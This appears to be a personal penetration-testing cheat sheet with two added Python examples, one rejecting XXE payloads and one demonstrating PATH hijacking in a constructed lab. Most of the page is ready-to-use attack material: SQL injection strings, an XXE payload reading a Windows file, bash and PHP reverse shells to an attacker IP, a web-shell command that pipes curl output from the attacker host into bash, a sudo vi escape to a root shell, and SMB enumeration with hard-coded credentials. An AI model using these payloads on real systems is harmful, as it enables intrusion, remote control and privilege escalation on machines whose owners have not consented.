Penetration Test
Flow
VA (vulnerability assessment) -> PT (penetration test)
- Planning and Reconnaissance
- Scanning
- Gaining System Access
- Persistent Access
- Analysis and Reporting
Injection
SQL injection
') or ( '1'='1
') or ( '1'=0
admin'||'1==1
1 or 1 = 1 UNION SELECT user
XXE (XML External Entity) injection
example: the SYSTEM entity pulls a local file (here c:\windows\win.ini) into the <item> element; if the application reflects <item>, the file contents come back in the response
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]>
<order>
<quantity>1</quantity>
<item>&test;</item>
<address>address</address>
</order>
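The defensive side of the payload above, as an added example that is not code from the original notes: before handing a document to any XML parser, walk it with expat and abort on the first DOCTYPE or entity declaration, so the SYSTEM entity is never reached, let alone expanded. The gate is independent of which XML library parses afterwards. The benign order document and the helper names are assumptions.

```python
import xml.parsers.expat as expat
import xml.etree.ElementTree as ET

# The payload from the notes above, plus a constructed benign order.
XXE_PAYLOAD = (
    '<?xml version="1.0"?>\n'
    "<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]>\n"
    "<order><quantity>1</quantity><item>&test;</item><address>address</address></order>"
)
CLEAN_ORDER = (
    '<?xml version="1.0"?>\n'
    "<order><quantity>1</quantity><item>widget</item><address>address</address></order>"
)


class ForbiddenXML(ValueError):
    """Raised when a document carries a DOCTYPE or an entity declaration."""


def reject_dtd(data):
    # expat reports the DOCTYPE and each entity declaration through handlers;
    # raising inside a handler stops parsing right there, so nothing after
    # the declaration (including the &test; reference) is ever processed.
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise ForbiddenXML("DOCTYPE not allowed (name=%r)" % name)

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        raise ForbiddenXML("entity declaration not allowed (name=%r, system id=%r)"
                           % (name, sysid))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(data, True)


def parse_order(data):
    """Parse an <order> document only after the DTD gate has passed."""
    reject_dtd(data)
    root = ET.fromstring(data)
    return {child.tag: child.text for child in root}


def is_rejected(data):
    """True when the gate refuses the document, False when it parses."""
    try:
        parse_order(data)
    except ForbiddenXML:
        return True
    return False


if __name__ == "__main__":
    print(parse_order(CLEAN_ORDER))
    print("payload rejected:", is_rejected(XXE_PAYLOAD))
```

Rejecting every DOCTYPE is the simplest policy and the one defusedxml applies by default; if an application genuinely needs internal DTDs, keep the EntityDeclHandler check and drop only the DOCTYPE one.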
SSTI (Server Side Template injection)
Tools:
- Java: VikasVarshney/ssti-payload: SSTI Payload Generator
- [Day13] - SSTI - iT 邦幫忙
- SSTI (Server Side Template Injection) - HackTricks
reverse shell
bash
bash -c "bash -i >& /dev/tcp/{your_IP}/443 0>&1"
php
<?php system('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc [ip] [port] > /tmp/f; rm /tmp/f'); ?>
Web shell
Dysco.php?cmd=curl ${your_IP}:8000/shell.sh|bash
Shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
vi
# output of `sudo -l`
# User postgres may run the following commands on vaccine:
# (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
# step 1: escape from an unprivileged vi (the shell runs as the current user)
vi
:set shell=/bin/sh
:shell
# step 2: the same escape from the sudo-allowed vi; the spawned shell runs as root
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
:set shell=/bin/sh
:shell
SSH tunnel
# windows
# linux: list the ssh connections open on this host (spot existing tunnels and sessions)
lsof -i -n | egrep '\<ssh\>'
139,445 - Pentesting SMB
# list the shares and walk their files recursively with the given credentials
smbmap -R -u "hazard" -p "stealth1agent" -H $ip
# get the user list by cycling RIDs (lookupsid.py from impacket)
# https://github.com/SecureAuthCorp/impacket/blob/master/examples/lookupsid.py
python lookupsid.py hazard:stealth1agent@$ip
Program Language
What can you do when you hack into the server
See below
# upgrade the raw socket shell to a pty, then give it a usable terminal type
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-256color
# prepend a writable directory to PATH: anything called by bare name now resolves there first
export PATH="/tmp:$PATH"; echo $PATH;
whoami
# sudo rules for this user, the first place to look for privilege escalation
sudo -l
# running processes: services and cron jobs running as root
ps aux
id
groups
# accounts with a real login shell
cat /etc/passwd | grep -v "nologin\|false\|sync"
# run a command with a 5-second limit so it cannot hang the shell
timeout 5s ...
# listening TCP/UDP sockets, including services bound to localhost only
ss -tul
# PATH hijack through sudo: only works when sudo passes PATH through; check the Matching Defaults lines of `sudo -l` for env_reset / secure_path, which pin PATH
sudo PATH="/tmp:$PATH" /usr/bin/whoami
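The PATH-hijack lines above (`export PATH="/tmp:$PATH"` and the sudo variant), as an added example that is not code from the original notes: a constructed lab in a temporary directory where a target script calls `id` by bare name, the way a sloppy backup or maintenance script would. Run with a writable directory first in PATH, the script executes the planted `id` instead of the real one. The script name backup.sh, the tmp subdirectory and the marker string are assumptions; the lab runs as the current user and does not involve sudo, so it shows the mechanism, not the secure_path caveat.

```python
import os
import subprocess
import tempfile

MARKER = "HIJACKED"  # printed by the planted binary (assumption)


def build_lab():
    """Constructed lab: a directory holding backup.sh, a target script that
    calls `id` by bare name (stands in for a privileged script)."""
    lab = tempfile.mkdtemp(prefix="pathlab-")
    target = os.path.join(lab, "backup.sh")
    with open(target, "w") as fh:
        fh.write("#!/bin/sh\nid\n")  # bare name, resolved through PATH
    os.chmod(target, 0o755)
    return lab, target


def plant_fake(directory, name="id"):
    """Drop an attacker-controlled `id` into a directory we can write to."""
    fake = os.path.join(directory, name)
    with open(fake, "w") as fh:
        fh.write("#!/bin/sh\necho " + MARKER + "\n")
    os.chmod(fake, 0o755)
    return fake


def run_with_path(target, path):
    """Run the target script with PATH set to `path`; return its stdout."""
    env = dict(os.environ, PATH=path)
    proc = subprocess.run(["/bin/sh", target], env=env,
                          capture_output=True, text=True)
    return proc.stdout.strip()


def demo():
    """Return (clean output, hijacked output) for the same script."""
    lab, target = build_lab()
    writable = os.path.join(lab, "tmp")  # plays the role of /tmp
    os.mkdir(writable)
    plant_fake(writable)
    clean = run_with_path(target, "/usr/bin:/bin")
    hijacked = run_with_path(target, writable + ":/usr/bin:/bin")
    return clean, hijacked


if __name__ == "__main__":
    clean, hijacked = demo()
    print("normal PATH  :", clean)
    print("hijacked PATH:", hijacked)
```

The fix on the defending side is the one the page's own command hints at: call binaries by absolute path inside privileged scripts, and leave sudo's secure_path in place so a caller's PATH never reaches them.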
Last modified March 17, 2023: update (cdf1f69)